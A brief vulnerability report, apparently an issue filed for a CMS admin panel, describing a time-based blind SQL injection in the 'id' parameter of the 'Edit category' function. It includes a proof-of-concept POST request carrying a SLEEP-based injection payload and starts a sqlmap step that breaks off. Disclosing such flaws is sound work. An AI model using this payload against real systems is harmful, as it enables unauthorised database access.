There is SQL blind injection at "Edit category"(Column administrator authority)

[UUFR]

Log in to the background as the default account admin. We click in order and grab packets: There is a time-based blind SQL injection vulnerability in the location of id. POC: http://192.168.102.129:82/admin/admin.php post:name=test&nickname=test&fid=&cattpl=&listtpl=&distpl=&intro=test&orders=0&status=1&action=category&id=3) AND (SELECT 8663 FROM (SELECT(SLEEP(10)))IUse) AND (6655=6655&ctrl=update&Submit=%E6%8F%90%E4%B

sqlmap: Save the HTTP request package as a file . Test using the SQLMap tool :